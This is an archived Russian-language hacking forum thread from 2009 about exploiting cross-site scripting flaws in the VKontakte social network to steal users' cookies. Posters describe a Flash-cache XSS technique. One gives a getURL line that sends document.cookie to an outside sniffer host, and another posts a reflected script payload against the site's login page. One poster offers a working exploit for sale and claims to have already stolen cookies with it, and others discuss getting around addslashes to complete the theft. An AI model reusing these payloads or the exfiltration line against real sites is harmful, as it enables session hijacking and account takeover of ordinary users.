PDA

Просмотр полной версии : xss VKONTAKTE


Ylka
08.01.2009, 23:43
На многих форумах и сайтах я встричал ето :

В популярной социальной сети ВКонтакте.ру, в сервисе Приложения обнаружена XSS-уязвимость.

Она заключается в том, что в исходный код флэшки можно внедрить javascript, который при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем.

Когда флэшка сохранилась в кэше браузера, то она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится.

Единственное, что спасает, - это блокировщик всплывающих окон. Но обычные пользователи, видя, что открывает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6 и FF3RC1

Как ето здєлать ???
Помогите написать FLASH

iddqd
08.01.2009, 23:48
давно уже неактуально :(

Ylka
08.01.2009, 23:56
Ну и что всеодно очень нужно помогите

Zitt
09.01.2009, 02:58
возми любой учеьник по флеш....

Ylka
09.01.2009, 12:41
Как можна взять льбую FLASH і впихнути в ее JAVA которий будєт потом виполнят скрипт і которий будєт входити на сайт фейк І подскажите што нада туда впихнути

Ylka
10.01.2009, 01:36
В популярной социальной сети ВКонтакте.ру, в сервисе Приложения обнаружена XSS-уязвимость.

Она заключается в том, что в исходный код флэшки можно внедрить javascript, который при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем.

Когда флэшка сохранилась в кэше браузера, то она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится.

Единственное, что спасает, - это блокировщик всплывающих окон. Но обычные пользователи, видя, что открывает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6 и FF3RC1
Пример атаки:

http://vkontakte.ru/apps.php?act=s&id=15… (новое окно открывается через 2 секунды)



Как ето здєлать ?????

vitalikis
15.01.2009, 23:18
подскажите нормальную пасивку вк, а то ту что в фильтре друзей и редактирование аудио\заметок и т.д. нормально не заюзаеш

Executor-666
15.01.2009, 23:23
эх были такие милые приложения,которые автоматически создавали группы.

vitalikis
16.01.2009, 00:04
а толку? в названиях группы всё фильтруется

Executor-666
16.01.2009, 00:19
а толку? в названиях группы всё фильтруется
мне бы найти эту программку,что бы группы регить,а потом просматривать номера групп,сечешь тему)

vitalikis
16.01.2009, 00:34
сечешь тему

толкать красивые ид? помоему тема не совсем актуальна...

Executor-666
16.01.2009, 02:01
ну ,хз,кому то может быть и актуальна

Ylka
16.01.2009, 14:23
Мне етот способ актуален
Подскажити он счас работает вконтакте ????

vitalikis
17.01.2009, 00:49
Подскажити он счас работает вконтакте ????

Не актуален, по крайней мере там теперь есть параметер hash=, ну думаю придумать при большом желании что то можно

З.Ы. тема про xss....

Ylka
17.01.2009, 13:29
Не актуален, по крайней мере там теперь есть параметер hash=, ну думаю придумать при большом желании что то можно

З.Ы. тема про xss....


Например што ???

vitalikis
17.01.2009, 16:29
например скрипт кторый бы эмулировал нажатие кнопки, но это не кому не нужно

Давайте лучше по теме

IDW
17.01.2009, 17:19
сделай во флэше красивую кнопку Play, на ней замути что-то типа

getURL("http://rulix.h18.ru/?+document.cookie");

Ylka
17.01.2009, 18:09
сделай во флэше красивую кнопку Play, на ней замути что-то типа

getURL("http://rulix.h18.ru/?+document.cookie");


На снифер или на што ???

Carbonm
08.04.2009, 16:21
могу продать пассивку 50$. работает 100%! (уже cookies воровал) ICQ семь 7 шесть 33600

t3cHn0iD
08.04.2009, 19:59
http://vkontakte.ru/login.php?u=1&to=>"><script>alert(/t3cHn0iD/)</script> - нате вам пассивку

Whirt
08.04.2009, 20:01
t3cHn0iD , респект , если сам нашел. работает)) правда скоро прикроют)

t3cHn0iD
08.04.2009, 20:36
Есть и другие варианты (но о них попозже =)))

Ylka
09.04.2009, 19:01
http://vkontakte.ru/login.php?u=1&to=>"><script>alert(/t3cHn0iD/)</script> - нате вам пассивку

А што вона делает. Нею как то можно воспользоватса. Для кражи куков или ищо штото. ?

wildshaman
09.04.2009, 19:03
А што вона делает. Нею как то можно воспользоватса. Для кражи куков или ищо штото. ?

с ее помощью можно уроки выучить =\

Carbonm
09.04.2009, 23:22
можно

IcEnd
09.04.2009, 23:43
можно
Каким способом?

Carbonm
10.04.2009, 09:11
нужно написать javascript, который обходит addslashes() , а потом написать или скачать сниффер.

offline
10.04.2009, 18:15
про adslashes можно пополробнее )

иддкд
10.04.2009, 20:03
и да, какбе пофиксено!

offline
10.04.2009, 20:33
млин (( даже не наигрался

Ylka
10.04.2009, 22:33
Уже все(

dvion
11.04.2009, 01:18
Сначала '+' зареплейсили (с самого начала воркало, вроде), я даже офигел от оперативности тамошних ботанов )
Потом опять фиксанул, нормально - проработало дольше, чем думалось)

getcouz
11.04.2009, 01:35
быстро...0_0